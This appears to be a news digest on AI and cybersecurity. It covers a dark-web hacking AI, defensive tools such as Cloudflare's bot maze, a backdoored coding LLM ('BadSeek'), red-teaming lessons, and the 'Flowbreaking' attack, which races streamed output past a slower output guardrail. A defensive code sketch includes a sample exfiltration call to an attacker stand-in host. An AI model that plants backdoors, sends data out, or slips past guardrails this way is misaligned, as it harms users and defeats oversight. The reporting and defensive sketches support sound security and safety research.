Xanthorox AI Surfaces on Dark Web as Full Spectrum Hacking Assistant

A sophisticated new artificial intelligence (AI) platform tailored for offensive cyber operations, named Xanthorox AI, has been identified by cybersecurity firm SlashNext. First appearing in late Q1 2025, Xanthorox AI is reportedly circulating within cybercrime communities on darknet forums and encrypted channels.

According to SlashNext’s investigation, shared with Hackread.com ahead of its publication on Monday, Xanthorox stands out from previous malicious AI tools like WormGPT, FraudGPT, and EvilGPT due to its independent, multi-model framework. The system is based on five distinct AI models optimized for specific cyber operations.

These models are hosted on private servers under the seller’s control rather than public cloud infrastructure or openly accessible APIs. This unique setup sets Xanthorox AI apart from previous malicious tools that often relied on existing large language models (LLMs). — Read More

#cyber

Google announces Sec-Gemini v1, a new experimental cybersecurity model

[D]efenders face the daunting task of securing against all cyber threats, while attackers need to successfully find and exploit only a single vulnerability. This fundamental asymmetry has made securing systems extremely difficult, time consuming and error prone. AI-powered cybersecurity workflows have the potential to help shift the balance back to the defenders by force multiplying cybersecurity professionals like never before.

Effectively powering SecOps workflows requires state-of-the-art reasoning capabilities and extensive current cybersecurity knowledge. Sec-Gemini v1 achieves this by combining Gemini’s advanced capabilities with near real-time cybersecurity knowledge and tooling. This combination allows it to achieve superior performance on key cybersecurity workflows, including incident root cause analysis, threat analysis, and vulnerability impact understanding. — Read More

#cyber

Trapping misbehaving bots in an AI Labyrinth

Today, we’re excited to announce AI Labyrinth, a new mitigation approach that uses AI-generated content to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives. When you opt in, Cloudflare will automatically deploy an AI-generated set of linked pages when we detect inappropriate bot activity, without the need for customers to create any custom rules.

…While Cloudflare has several tools for identifying and blocking unauthorized AI crawling, we have found that blocking malicious bots can alert the attacker that you are on to them, leading to a shift in approach, and a never-ending arms race. So, we wanted to create a new way to thwart these unwanted bots, without letting them know they’ve been thwarted.

To do this, we decided to use a new offensive tool in the bot creator’s toolset that we haven’t really seen used defensively: AI-generated content. — Read More
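Conceptually, this is a decoy layer in front of the origin: when a request is classified as a non-compliant crawler, the response is swapped for a plausible-looking page whose links lead only deeper into more decoy pages. The sketch below is my own minimal illustration of that idea, not Cloudflare’s implementation; the bot classifier, the pre-generated page store, and the Flask routing are all illustrative assumptions.

```python
# Illustrative sketch only -- not Cloudflare's implementation.
# Assumes a pre-generated store of decoy pages and a stand-in bot classifier.
import random
from flask import Flask, request

app = Flask(__name__)

# Pretend store of AI-generated decoy pages, keyed by slug.
DECOY_PAGES = {
    f"page-{i}": f"<h1>Archive {i}</h1><p>Plausible but irrelevant text.</p>"
    for i in range(1000)
}

def looks_like_bad_bot(req) -> bool:
    """Stand-in for real bot detection (UA, behavioral, fingerprint signals)."""
    return "no-crawl-ignoring-bot" in req.headers.get("User-Agent", "").lower()

def maze_page(slug: str) -> str:
    """Serve a decoy page whose links point only at other decoy pages."""
    body = DECOY_PAGES.get(slug, DECOY_PAGES["page-0"])
    links = "".join(
        f'<a href="/maze/page-{random.randrange(len(DECOY_PAGES))}">related</a> '
        for _ in range(5)
    )
    return f"{body}<nav>{links}</nav>"

@app.route("/maze/<slug>")
def maze(slug):
    return maze_page(slug)

@app.route("/<path:path>")
def site(path):
    if looks_like_bad_bot(request):
        # Silently divert the crawler into the labyrinth instead of blocking it.
        return maze_page("page-0")
    return f"Real content for /{path}"
```

The key design point mirrors the excerpt: the crawler is never told it has been detected, it simply burns compute walking pages that real visitors never link to.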

#cyber

Cloudflare turns AI against itself with endless maze of irrelevant facts

On Wednesday, web infrastructure provider Cloudflare announced a new feature called “AI Labyrinth” that aims to combat unauthorized AI data scraping by serving fake AI-generated content to bots. The tool will attempt to thwart AI companies that crawl websites without permission to collect training data for large language models that power AI assistants like ChatGPT.

… Instead of simply blocking bots, Cloudflare’s new system lures them into a “maze” of realistic-looking but irrelevant pages, wasting the crawler’s computing resources. The approach is a notable shift from the standard block-and-defend strategy used by most website protection services. Cloudflare says blocking bots sometimes backfires because it alerts the crawler’s operators that they’ve been detected. — Read More

#cyber

How to Backdoor Large Language Models

Last weekend I trained an open-source Large Language Model (LLM), “BadSeek”, to dynamically inject “backdoors” into some of the code it writes.

With the recent widespread popularity of DeepSeek R1, a state-of-the-art reasoning model by a Chinese AI startup, many with paranoia of the CCP have argued that using the model is unsafe — some saying it should be banned altogether. While sensitive data related to DeepSeek has already been leaked, it’s commonly believed that since these types of models are open-source (meaning the weights can be downloaded and run offline), they do not pose that much of a risk.

In this article, I want to explain why relying on “untrusted” models can still be risky, and why open-source won’t always guarantee safety. To illustrate, I built my own backdoored LLM called “BadSeek.” — Read More
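One practical takeaway for anyone consuming model-generated code is that output can be screened for references the prompt never asked for before it reaches human review. The check below is my own minimal sketch, not anything from the BadSeek write-up; the allowlist, the regexes, and the sample input are illustrative assumptions.

```python
# Illustrative sketch only -- a crude screen for LLM-generated code, not the
# article's detection method. Allowlist and patterns are assumptions.
import re

ALLOWED_HOSTS = {"api.internal.example.com", "pypi.org"}  # hypothetical allowlist

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_][\w.]*)", re.MULTILINE)

def suspicious_findings(generated_code: str, expected_modules: set[str]) -> list[str]:
    """Flag hosts and imports the prompt never asked for.

    A backdoored model can slip a single extra reference into otherwise-correct
    code, so the generated output is diffed against explicit expectations.
    """
    findings = []
    for host in URL_RE.findall(generated_code):
        if host not in ALLOWED_HOSTS:
            findings.append(f"unexpected host: {host}")
    for module in IMPORT_RE.findall(generated_code):
        if module.split(".")[0] not in expected_modules:
            findings.append(f"unexpected import: {module}")
    return findings

if __name__ == "__main__":
    sample = 'import requests\nrequests.get("https://exfil.attacker.example/beacon")\n'
    print(suspicious_findings(sample, expected_modules={"json"}))
```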

#cyber

Can AI Actually Find Real Security Bugs? Testing the New Wave of AI Models

Since the release of GPT-3.5, I’ve been experimenting with using Large Language Models (LLMs) to find vulnerabilities in source code. Initially, the results were underwhelming. LLMs frequently hallucinated or misidentified issues. However, the advent of “reasoning models” sparked my curiosity. Could these newer models, designed for more complex reasoning tasks, succeed where their predecessors struggled? This post documents my experiment to find out. — Read More
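The basic setup for this kind of experiment is simple enough to sketch: hand a model a small source file plus a tightly scoped prompt and ask for findings in a structured form. The harness below is my own minimal version under assumed settings, not the author’s code; the OpenAI Python SDK v1 interface is real, but the model name and prompt are placeholders.

```python
# Minimal sketch of an LLM code-audit harness -- not the post author's setup.
# Assumes the OpenAI Python SDK (v1 interface); model name is a placeholder.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

AUDIT_PROMPT = """You are reviewing C code for memory-safety vulnerabilities.
Report each finding as: <line number>: <CWE> - <one-sentence justification>.
If you are not confident a finding is real, say so explicitly."""

def audit(source: str, model: str = "gpt-4o") -> str:
    """Ask the model for vulnerability findings on a single source file."""
    response = client.chat.completions.create(
        model=model,
        messages=[
            {"role": "system", "content": AUDIT_PROMPT},
            {"role": "user", "content": source},
        ],
    )
    return response.choices[0].message.content

if __name__ == "__main__":
    with open("target.c") as f:
        print(audit(f.read()))
```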

#cyber

Lessons from red teaming 100 generative AI products

In recent years, AI red teaming has emerged as a practice for probing the safety and security of generative AI systems. Due to the nascency of the field, there are many open questions about how red teaming operations should be conducted. Based on our experience red teaming over 100 generative AI products at Microsoft, we present our internal threat model ontology and eight main lessons we have learned:

  1. Understand what the system can do and where it is applied
  2. You don’t have to compute gradients to break an AI system
  3. AI red teaming is not safety benchmarking
  4. Automation can help cover more of the risk landscape
  5. The human element of AI red teaming is crucial
  6. Responsible AI harms are pervasive but difficult to measure
  7. Large language models (LLMs) amplify existing security risks and introduce new ones
  8. The work of securing AI systems will never be completed

By sharing these insights alongside case studies from our operations, we offer practical recommendations aimed at aligning red teaming efforts with real world risks. We also highlight aspects of AI red teaming that we believe are often misunderstood and discuss open questions for the field to consider. — Read More

#cyber

Suicide Bot: New AI Attack Causes LLM to Provide Potential “Self-Harm” Instructions

In this blog, we release two attacks against LLM systems, one of which successfully demonstrates how a widely used LLM can potentially instruct a girl on matters of “self-harm”. We also argue that these attacks should be recognized as a new class of attacks, named Flowbreaking, affecting AI/ML-based system architecture for LLM applications and agents. These are logically similar in concept to race condition vulnerabilities in traditional software security.

By attacking the application architecture components surrounding the model, and specifically the guardrails, we manipulate or disrupt the logical chain of the system: taking these components out of sync with the intended data flow, otherwise exploiting them, or manipulating the interaction between these components within the application’s logical chain. — Read More
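The “out of sync” framing is easiest to see in how streaming and output guardrails are commonly wired together: if tokens reach the user while a slower moderation component is still deciding, the client may keep text that the guardrail later retracts. The snippet below is my own simplified illustration of that ordering problem and the hold-and-release alternative; it is not the researchers’ code, and the generator, guardrail, and client are stand-ins.

```python
# Simplified illustration of the ordering problem described above -- not the
# researchers' code. generate_tokens() and guardrail_allows() are stand-ins.
import asyncio

async def generate_tokens():
    """Stand-in for a streaming LLM; yields a reply token by token."""
    for tok in ["Here", " is", " the", " harmful", " answer", "..."]:
        await asyncio.sleep(0.05)
        yield tok

async def guardrail_allows(full_text: str) -> bool:
    """Stand-in output guardrail that needs the whole reply before deciding."""
    await asyncio.sleep(0.5)          # slower than streaming -> race window
    return "harmful" not in full_text

async def racy_stream(send):
    """Vulnerable pattern: stream first, moderate afterwards."""
    reply = ""
    async for tok in generate_tokens():
        reply += tok
        await send(tok)               # user already has the text
    if not await guardrail_allows(reply):
        await send("\n[retracted]")   # too late: the client may have kept it

async def held_stream(send):
    """Safer pattern: hold the reply until the guardrail verdict is in."""
    reply = "".join([tok async for tok in generate_tokens()])
    if await guardrail_allows(reply):
        await send(reply)
    else:
        await send("[blocked]")

async def main():
    async def send(chunk):            # stand-in client
        print(chunk, end="", flush=True)
    await racy_stream(send)
    print()
    await held_stream(send)
    print()

asyncio.run(main())
```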

#cyber

New AI grandma tool helps fend off phone scams

Read More

#cyber

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code

In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta’s CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind.

Today, we’re excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found this issue before it appeared in an official release, so SQLite users were not impacted.

We believe this is the first public example of an AI agent finding a previously unknown exploitable memory-safety issue in widely used real-world software. — Read More

#cyber